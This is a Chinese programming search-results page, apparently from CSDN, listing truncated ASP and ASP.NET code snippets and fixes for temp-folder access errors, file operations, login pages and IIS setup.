    2021-01-03 00:26:23
    代码如下:TempSource,TempEnd必须用绝对路径 rootPath=Request.ServerVariables(“APPL_PHYSICAL_PATH”) ‘获取当前程序绝对路径 Function CopyFiles(TempSource,TempEnd) Dim FSO Set FSO = Server....
  • .net TEMP 文件夹权限设置

    千次阅读 2014-09-11 10:54:34
    未能写入输出文件“c:/WINDOWS/Microsoft.NET/Framework/v2.0.50727/Temporary ASP.NET Files/root/*.dll”--“拒绝访问。 ”的错误 解决方法: 1.设置 Temporary ASP.NET Files 目录的访问权限,将Network ...

    错误提示:

    未能写入输出文件“c:/WINDOWS/Microsoft.NET/Framework/v2.0.50727/Temporary ASP.NET Files/root/*.dll”--“拒绝访问。 ”的错误

    解决方法:

    1.设置 Temporary ASP.NET Files 目录的访问权限,将Network seivices 和IIS_IUSERS用户设置该目录完全控制权限.

    2.设置 windows/temp 目录的访问权限,将Network seivices 和IIS_IUSERS用户设置该目录完全控制权限.

     

    http://blog.sina.com.cn/s/blog_777a94a801014l4j.html

    展开全文
  • 您可能感兴趣的文章:ASP.NET对txt文件相关操作(读取、写入、保存)asp.net cookie的操作,写入、读取与操作Asp.Net 文件操作基类(读取,删除,批量拷贝,删除,写入,获取文件夹大小,文件属性,遍历目录)ASP.NET实现...
  • 在windows 2003下,在运行web应用程序的时候出现一下错误: 服务器无法处理请求,-->对路径“C:/temp/mytest.txt”的访问拒绝 说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该...
  • 代码如下: rs.open sql,conn,3,3 rs.addnew rs(“user”)=”小男” rs(“pass”)=”333333″ rs.update temp = rs.bookmark rs.bookmark = temp Response.write rs(“ID”) access返回添加后的自递增ID 用惯了asp中...
  • R学习-知识点记录(Temp

    千次阅读 2015-05-27 13:29:01
    x, y, xmin, xmax, ymin, ymax, xend, yend, data, xlim, ylim, xlab, ylab, asp,sep间隔 facets :图形/数据的分面。它把数据按某种规则进行分类,每一类数据做一个图形,所以最终效果就是一页多图 margins :...
  • Response.Buffer = True Response.Clear Dim Co,Temp,T,x,i,fsoBrowse,theFolder,TheSubFolders,FilePath,s,PH,objTar Co=0 PH=”./UpFile” ‘文件路径 ‘压缩Upfile下的所有文件 Set objTar = New ...
  • Const adSchemaTables = 20 adSchemaColumns = 4 dim Conn,db dim ConnStr db=”temp.mdb” ‘ACCESS数据库的文件名,请使用相对于网站根目录的的绝对路径 ConnStr = “Provider=Microsoft.Jet.OLEDB.4.0...
  •  var temp = “”; a[0] = new Array(1,”阿会楠”,”男”); a[1] = new Array(2,”小白兔”,”女”); a[2] = new Array(3,”小琦”,”女”); for(var i = 0;i < a.length;i ++) { tem
  • asp.net登录界面制作实例

    千次阅读 2014-12-13 20:06:20
     <asp:TableCell><asp:TextBox ID="txt_pwd" runat="server" TextMode="Password"></asp:TextBox></asp:TableCell>  </asp:TableRow>  <asp:TableRow ID="TableRow1" runat="server">  <asp:TableCell>...
  • Asp+Ajax仿google搜索提示效果 数据库版需要修改的地方有 代码如下: javascript.js var url=”ajax.asp”; //后台地址 var time_delayajax=300; //搜索延迟 var time_delayupdown=100; //方向键延迟 obj_div.style....
  • 以下是menu.asp代码 程序代码 <% ‘————————————— ‘作者:野 草 ‘日期:2006年4月24日 ‘Q Q:94440079 ‘————————————— ‘读取XML文件函数 Function YCMS_menu() dim menu_temp,m ...
  • asp.net登录时生成验证码的方法

    千次阅读 2014-12-13 17:04:53
     <asp:TableCell><asp:TextBox ID="TextBox2" runat="server" TextMode="Password"></asp:TextBox></asp:TableCell>  </asp:TableRow>  <asp:TableRow ID="TableRow1" runat="server">  <asp:TableCell>...
  • Asp.net用户登陆模块(C#) private void btn_login_Click(object sender, System.EventArgs e) { //创建连接对象MyConn SqlConnection MyConn=new SqlConnection(System.Configuration.ConfigurationSettings....
  • 代码如下:‘************************************************** ‘函数ID:0016[获得执行程序的名称] ...Function GT_the_proname() Dim fu_name,temp,tempsiz temp=Request.ServerVariables(“PATH_INFO”) 
  • 代码如下:arr = array(12,52,14,43,24,58,15,64,24,57,17,56,45) arrLen = ubound(arr) for i=0 to arrLen-1 for j = 0 to (arrlen -1)-i if arr(j)>arr(j+1) then temp = arr(j) arr(j)= arr(j+1) arr(j+1) = temp ...
  • 4. 给 C:\Window\Temp 目录,设置IUSR读写权限,解决(Microsoft JET Database Engine 错误 ‘80004005’)错误。 1. 让IIS7支持ASP Win7或Windows server 2008中IIS7是默认不安装的,所以在安装完Win7或Windo
  • IIS7下面运行Asp+Access数据库,无法运行。 在goole、百度里搜了半天,没有搜到解决办法。在远景看到有几个人问,似乎有一个人声称自己成功了,然而却没有给出方法。 今天突然心血来潮想起到微软网站上搜了下,终于...
  • %>’ OnCommand=”comment_click” 代码如下:protected void comment_click(object sender,CommandEventArgs e) { string temp = e.CommandArgument.ToString(); MessageBox.Show(temp); } 您可能感
  • 函数getcache,会自动... 所缓存的内容是否为一个数据[0为字符串,1为数组] ‘ timeinfo —- 缓存更新时间,单位为秒,当值为0时,则只在缓存为空时,才更新 dim domain = “cnzhaopin.com.cn” Dim temp_getconfig Dim
  • asp 图表生成控件

    2010-05-17 01:24:57
    1、调用方法见例子,asp目录下的文件是用例; 2、设置的保存数据库 key.i.mdb system.ini 必须与 Key.i_Graph.dll 放同一目录,不要把它们引入IIS目录,如果引入需设置好,避免 key.i.mdb system.ini 被下载(里面...
  • 示例(拷贝到vs2005中即可用,下面不再说明) 代码如下: public partial class Form1 : Form { public static void UseParams(params int[] list) { string temp = “”; for (int i = 0; i < list.Length; i++)...
  •  Dim tvar As Integer, returnstr As String, tmove As Integer, temp As Integer ‘初始化随机数产生器实现真正的随机性. Randomize (Timer) For tvar = 1 To 32 ‘共有32支球队 If (tvar

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 33,784
精华内容 13,513
关键字:

asptemp